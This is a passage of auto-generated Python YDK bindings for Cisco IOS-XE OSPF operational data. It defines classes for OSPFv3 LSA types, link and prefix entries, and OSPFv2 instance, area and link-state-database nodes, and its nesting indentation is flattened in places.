            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()

            # Position of this node in the YANG schema tree.
            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])  # no child containers
            # Single boolean leaf.
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            # Frozen last, after all declared attributes exist.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Delegate writes to YDK's _perform_setattr with the declared leaf names.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
    """
    OSPFv3 NSSA
    .. attribute:: lsa_nssa_external
    NSSA LSA
    **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>`
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "nssa"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child container; this node itself declares no leafs.
        self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
        self._leafs = OrderedDict()

        # Instantiate the child container and wire its parent back-reference.
        self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
        self.lsa_nssa_external.parent = self
        self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"

        self._segment_path = lambda: "nssa"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr; no leafs are settable here.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)

    class LsaNssaExternal(Entity):
        """
        NSSA LSA
        .. attribute:: metric
        Metric
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: flags
        LSA Flags
        **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>`
        **config**\: False
        .. attribute:: referenced_ls_type
        Referenced Link State type
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: external_prefix
        Prefix
        **type**\: str
        **config**\: False
        .. attribute:: external_prefix_options
        Prefix options
        **type**\: str
        **config**\: False
        .. attribute:: forwarding_address
        Forwarding address
        **type**\: union of the below types:
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: external_route_tag
        Route tag
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: referenced_link_state_id
        Referenced Link State ID
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        """

        # YANG module metadata: model prefix and revision date.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()

            # Position of this node in the YANG schema tree.
            self.yang_name = "lsa-nssa-external"
            self.yang_parent_name = "nssa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Single child container: the LSA flags.
            self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
            # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
            # forwarding-address is a union of IPv4/IPv6 string forms, hence two 'str' entries.
            self._leafs = OrderedDict([
                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ])
            # Leaf values start unset; assignments route through __setattr__ below.
            self.metric = None
            self.referenced_ls_type = None
            self.external_prefix = None
            self.external_prefix_options = None
            self.forwarding_address = None
            self.external_route_tag = None
            self.referenced_link_state_id = None

            # Instantiate the child container and wire its parent back-reference.
            self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
            self.flags.parent = self
            self._children_name_map["flags"] = "flags"

            self._segment_path = lambda: "lsa-nssa-external"
            # Frozen last, after all declared attributes exist.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Delegate writes to YDK's _perform_setattr with the declared leaf names.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)

        class Flags(Entity):
            """
            LSA Flags
            .. attribute:: e_flag
            When set, the metric specified is a Type 2 external metric
            **type**\: bool
            **config**\: False
            """

            # YANG module metadata: model prefix and revision date.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()

                # Position of this node in the YANG schema tree.
                self.yang_name = "flags"
                self.yang_parent_name = "lsa-nssa-external"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # no child containers
                # Single boolean leaf.
                self._leafs = OrderedDict([
                    ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                ])
                self.e_flag = None
                self._segment_path = lambda: "flags"
                # Frozen last, after all declared attributes exist.
                self._is_frozen = True

            def __setattr__(self, name, value):
                # Delegate writes to YDK's _perform_setattr with the declared leaf names.
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
    """
    OSPFv3 Link data
    .. attribute:: rtr_priority
    Router priority of the interface
    **type**\: int
    **range:** 0..255
    **config**\: False
    .. attribute:: link_local_interface_address
    The originating router's link\-local interface address on the link
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: num_of_prefixes
    Number of prefixes
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: lsa_id_options
    Link data LSA options
    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "link-data"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        # link-local-interface-address is a union of IPv4/IPv6 string forms.
        self._leafs = OrderedDict([
            ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
            ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
            ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
        ])
        # Value assignments route through the overridden __setattr__ below.
        self.rtr_priority = None
        self.link_local_interface_address = None
        self.num_of_prefixes = None
        self.lsa_id_options = Bits()
        self._segment_path = lambda: "link-data"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
    """
    OSPFv3 Intra area prefixes
    .. attribute:: referenced_ls_type
    Referenced Link State type
    **type**\: int
    **range:** 0..65535
    **config**\: False
    .. attribute:: referenced_link_state_id
    Referenced Link State ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: referenced_adv_router
    Referenced Advertising Router
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: num_of_prefixes
    Number of prefixes
    **type**\: int
    **range:** 0..65535
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "ia-prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        # referenced-adv-router is a union of IPv4/IPv6 string forms.
        self._leafs = OrderedDict([
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
        ])
        # Leaf values start unset; assignments route through __setattr__ below.
        self.referenced_ls_type = None
        self.referenced_link_state_id = None
        self.referenced_adv_router = None
        self.num_of_prefixes = None
        self._segment_path = lambda: "ia-prefix"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
    """
    OSPFv3 links
    .. attribute:: interface_id (key)
    Interface ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: neighbor_interface_id (key)
    Neighbor interface ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: neighbor_router_id (key)
    Neighbor router ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: type
    Link type
    **type**\: int
    **range:** 0..255
    **config**\: False
    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..65535
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "ospfv3-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # This is a YANG list entry; the three leafs below form its compound key.
        self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        self._leafs = OrderedDict([
            ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
            ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
            ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        # Leaf values start unset; assignments route through __setattr__ below.
        self.interface_id = None
        self.neighbor_interface_id = None
        self.neighbor_router_id = None
        self.type = None
        self.metric = None
        # XPath segment embeds the current key values at evaluation time.
        self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
    """
    OSPFv3 prefix\-list
    .. attribute:: prefix (key)
    Prefix
    **type**\: str
    **config**\: False
    .. attribute:: prefix_options
    Prefix options
    **type**\: str
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "ospfv3-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list entry keyed by the 'prefix' leaf.
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        # Leaf values start unset; assignments route through __setattr__ below.
        self.prefix = None
        self.prefix_options = None
        # XPath segment embeds the current key value at evaluation time.
        self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
    """
    OSPFv3 intra\-area prefix\-list
    .. attribute:: prefix (key)
    Prefix
    **type**\: str
    **config**\: False
    .. attribute:: prefix_options
    Prefix options
    **type**\: str
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "ospfv3-ia-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list entry keyed by the 'prefix' leaf.
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])  # no child containers
        # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        # Leaf values start unset; assignments route through __setattr__ below.
        self.prefix = None
        self.prefix_options = None
        # XPath segment embeds the current key value at evaluation time.
        self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
    """
    OSPF multi\-topology interface augmentation
    .. attribute:: name (key)
    One of the topology enabled on this interface
    **type**\: str
    **config**\: False
    """

    # YANG module metadata: model prefix and revision date.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__()

        # Position of this node in the YANG schema tree.
        self.yang_name = "multi-topology"
        self.yang_parent_name = "ospf-instance"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list entry keyed by the topology 'name' leaf.
        self.ylist_key_names = ['name']
        self._child_classes = OrderedDict([])  # no child containers
        self._leafs = OrderedDict([
            ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ])
        # Leaf value starts unset; the assignment routes through __setattr__ below.
        self.name = None
        # XPath segment embeds the current key value at evaluation time.
        self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
        # Frozen last, after all declared attributes exist.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate writes to YDK's _perform_setattr with the declared leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value)
class Ospfv2Instance(Entity):
"""
The OSPF instance
.. attribute:: instance_id (key)
The routing instance identifier assigned to the OSPF instance
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf_name
The name of the Virtual Routing and Forwarding instance that the OSPF instance is operating within
**type**\: str
**config**\: False
.. attribute:: router_id
The router identifier assigned to the OSPF instance
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_area
The OSPF area information
**type**\: list of :py:class:`Ospfv2Area <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area>`
**config**\: False
.. attribute:: ospfv2_lsdb_external
The external LSDB information
**type**\: list of :py:class:`Ospfv2LsdbExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Initialize the ospfv2-instance list-entry binding and its child lists."""
    super(OspfOperData.Ospfv2Instance, self).__init__()

    # Position of this node in the YANG schema tree.
    self.yang_name = "ospfv2-instance"
    self.yang_parent_name = "ospf-oper-data"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # YANG list entry keyed by 'instance_id'.
    self.ylist_key_names = ['instance_id']
    # Map of YANG child-list names -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))])
    # Leaf descriptors: python attribute -> (YLeaf wrapper, accepted types).
    self._leafs = OrderedDict([
        ('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])),
        ('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
        ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
    ])
    # Leaf values start unset; assignments route through the overridden __setattr__.
    self.instance_id = None
    self.vrf_name = None
    self.router_id = None

    # Child YANG lists are held as YList containers.
    self.ospfv2_area = YList(self)
    self.ospfv2_lsdb_external = YList(self)

    # XPath segment embeds the current key value at evaluation time; this node
    # also knows its absolute path from the model root.
    self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
    # Frozen last, after all declared attributes exist.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate all attribute writes to YDK's _perform_setattr (inherited from
    # Entity), passing the leaf names this class declares as settable.
    self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value)
class Ospfv2Area(Entity):
"""
The OSPF area information
.. attribute:: area_id (key)
The area identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_lsdb_area
The OSPF Link State Database information for this area
**type**\: list of :py:class:`Ospfv2LsdbArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea>`
**config**\: False
.. attribute:: ospfv2_interface
A list of interfaces that belong to the area
**type**\: list of :py:class:`Ospfv2Interface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Initialize the ospfv2-area list-entry binding and its child lists."""
    super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__()

    # Position of this node in the YANG schema tree.
    self.yang_name = "ospfv2-area"
    self.yang_parent_name = "ospfv2-instance"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # YANG list entry keyed by 'area_id'.
    self.ylist_key_names = ['area_id']
    # Map of YANG child-list names -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))])
    self._leafs = OrderedDict([
        ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
    ])
    # Leaf value starts unset; the assignment routes through the overridden __setattr__.
    self.area_id = None

    # Child YANG lists are held as YList containers.
    self.ospfv2_lsdb_area = YList(self)
    self.ospfv2_interface = YList(self)

    # XPath segment embeds the current key value at evaluation time.
    self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']"
    # Frozen last, after all declared attributes exist.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate all attribute writes to YDK's _perform_setattr (inherited from
    # Entity), passing the leaf names this class declares as settable.
    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value)
class Ospfv2LsdbArea(Entity):
"""
The OSPF Link State Database information for this area
.. attribute:: lsa_type (key)
Link State Advertisement type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: lsa_id (key)
Link State Advertisement Identifer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advertising_router (key)
Advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_age
The age of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: lsa_options
The options of the Link State Advertisement
**type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>`
**config**\: False
.. attribute:: lsa_seq_number
The sequence number for the Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_checksum
The checksum of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: lsa_length
The length, in bytes, of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: ospfv2_router_lsa_links
The router Link State Advertisement links
**type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks>`
**config**\: False
.. attribute:: unsupported_lsa
The unsupported Link State Advertisements
**type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa>`
**config**\: False
.. attribute:: router_lsa
The router Link State Advertisements
**type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa>`
**config**\: False
.. attribute:: network_lsa
The network Link State Advertisements
**type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa>`
**config**\: False
.. attribute:: network_summary_lsa
The network summary Link State Advertisements
**type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa>`
**config**\: False
.. attribute:: router_summary_lsa
The router summary Link State Advertisements
**type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa>`
**config**\: False
.. attribute:: external_lsa
The external Link State Advertisements
**type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa>`
**config**\: False
.. attribute:: nssa_lsa
The Not So Stubby Area Link state advertisements
**type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa>`
**config**\: False
"""
# YANG module prefix and revision this binding was generated from.
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    """Initialize the ospfv2-lsdb-area list entry: YANG metadata, leaf descriptors, child containers and defaults."""
    super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__()

    self.yang_name = "ospfv2-lsdb-area"      # YANG node name of this list
    self.yang_parent_name = "ospfv2-area"    # enclosing YANG container
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # This list entry is keyed by (lsa-type, lsa-id, advertising-router).
    self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
    # Child containers/lists reachable from this node: YANG name -> (python attr, class).
